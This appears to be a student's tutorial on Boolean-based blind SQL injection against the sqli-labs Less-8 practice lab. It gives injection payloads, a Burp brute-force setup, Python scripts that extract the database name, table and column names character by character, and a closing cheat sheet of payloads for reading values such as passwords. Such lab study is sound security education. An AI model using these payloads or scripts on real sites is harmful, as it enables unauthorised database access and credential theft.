Introduction: the earlier lessons covered injection techniques with visible output, such as error-based injection. This time we study Boolean-based blind injection in detail.
First, the concept of blind injection.
Blind injection is SQL injection performed without seeing the values the database returns: the content of the data has to be guessed from indirect signals, such as whether a page renders normally.
Boolean-based blind injection
Principle:
An injected condition makes the page behave in one of two ways: it renders normally when the condition is True and differently (or not at all) when it is False. Boolean blind injection therefore guesses information in the database one comparison at a time, based on whether the page shows its True or its False state.
Boolean blind injection relies on a few helper functions; a quick look at them first:
length() returns the length of a string
substring() (or substr()) extracts part of a string, given a start position (1-based) and a length
ord() returns the code of a single character (for a multi-byte character it returns the multi-byte code; ascii() returns only the value of the leftmost byte, 0 to 255, which is what the comparisons below rely on)
char() converts an ASCII code back into the corresponding character
For the exact usage see the senior's blog post on MySQL syntax; then we practise Boolean blind injection on sqli-labs.
Analyzing the injection point (i.e. the closing character)
Entering id=1' produces an error:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1'
Appending a comment sequence after id=1' makes the page display correctly again, so the injected value is enclosed in single quotes and the closing character is '.
Extracting the database name length
Knowing the closing character, we next find the length of the database name, using the length() function mentioned above:
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and length(database())>1 --+
The page displays correctly (True).
Injecting by hand, we repeat the request while increasing the number being compared until the page flips to False; the last value for which it is still True is one less than the length, which gives a database name length of 8.
Extracting the database name
With the length known, we extract the database name one character at a time:
Less-8/?id=1' and ord(substr(database(),1,1))>99 --+
Less-8/?id=1' and ascii(substr((database()),1,1)) > 99 --+
Less-8/?id=1' and ascii(substr((database()),1,1)) = 99 --+
The principle is the same in each case: take one character of the database name and compare its ASCII code against a guessed value until the character is pinned down, then move to the next position. Doing this by hand wastes time, so you can either write a script or brute-force it with Burp; both approaches are tried below.
Brute forcing with Burp
First capture the request and mark the positions to vary. There are two of them (character position and ASCII code), so choose the fourth attack type (Cluster bomb).
Set the first variable to numbers 1 to 8 (the character position) and the second to numbers 0 to 127 (the ASCII code).
Once both are set, start the attack.
It ran far too slowly, which probably means something in my Burp settings was wrong. It is worth knowing the method, but for the actual brute force a script is the better tool.
See also the senior's blog post on blind injection with Burp.
Brute forcing with a script
I can't yet write the script from scratch myself; the following is adapted from the senior's blog post on Boolean blind injection.
Syntax in the script that is unclear can be looked up in these posts by the same author:
Python Requests
Python introduction (def, defining functions)
Formatted output strings
import requests

def database_len():
    # length(database())>i stays True while i is below the real length;
    # the first i for which the page shows False is the length itself
    for i in range(1,10):
        url = '''http://127.0.0.1/sqli-labs-master/Less-8/index.php'''
        payload = '''?id=1' and length(database())>%s''' %i  # formatted output string
        # print(url+payload+'%23')
        r = requests.get(url+payload+'%23')  # %23 is a URL-encoded '#', commenting out the rest of the query
        if 'You are in' in r.text:  # marker of the True page in Less-8
            print(i)
        else:
            #print('false')
            print('database_length:',i)
            break

database_len()
def database_name():
    name = ''
    for j in range(1,9):  # character positions 1..8 (the length found above)
        for i in 'sqcwertyuioplkjhgfdazxvbnm':  # candidate characters: lowercase letters only
            url = "http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1' and substr(database(),%d,1)='%s'" %(j,i)
            # print(url+'%23')
            r = requests.get(url+'%23')
            if 'You are in' in r.text:  # True page: character j is i
                name = name+i
                print(name)
                break
    print('database_name:',name)

database_name()
With the database name and its length recovered, change the payload to extract the table names:
payload:
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>90 --+
Modify the script accordingly:
import requests

def table_name():
    name = ''
    for j in range(1,9):  # character positions 1..8
        for i in 'sqcwertyuioplkjhgfdazxvbnm':  # candidate characters: lowercase letters only
            # compare the ASCII code of character j of the first table name with the candidate
            url = "http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1)))=ord('%s')" %(j,i)
            # print(url+'%23')
            r = requests.get(url+'%23')
            if 'You are in' in r.text:
                name = name+i
                print(name)
                break
    print('table_name:',name)

table_name()
Changing the offset in limit 0,1 (limit 1,1, limit 2,1, ...) returns the other tables.
Extracting column names
payload:
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))>100 --+
Note that this filters on table_name only; if another schema on the same server also has a table called users, add and table_schema=database() to the WHERE clause so the columns come from the right one.
Modify the script and run it to get the column names:
import requests

def column_name():
    name = ''
    for j in range(1,9):  # character positions 1..8
        for i in 'sqcwertyuioplkjhgfdazxvbnm':  # candidate characters: lowercase letters only
            # compare the ASCII code of character j of the first column name of users with the candidate
            url = "http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),%d,1)))=ord('%s')" %(j,i)
            # print(url+'%23')
            r = requests.get(url+'%23')
            if 'You are in' in r.text:
                name = name+i
                print(name)
                break
    print('column_name:',name)

column_name()
Extracting values
?id=1' and (ascii(substr(( select password from users limit 0,1),1,1)))=68--+
The same script works here with only the payload changed, but the script has a weakness: it only iterates over the characters assigned to i, i.e. lowercase letters, so uppercase letters, digits and special characters never show up. Adding them to the candidate string fixes that, but it also makes the script much slower, since each character then costs up to several dozen requests. Better to learn more Python and write something more efficient.
To sum up, the Boolean blind statements commonly used:
Database name length
?id=1' and (length(database()))>1 --+
Database name
?id=1' and (ascii(substr(database(),1,1)))>1 --+
Table names
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>1 --+
Column names
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))>1 --+
Values
?id=1' and (ascii(substr((select password from users limit 0,1),1,1)))>1 --+
The statements are nearly identical and can be adapted as needed. That covers Boolean blind injection; next time, time-based blind injection.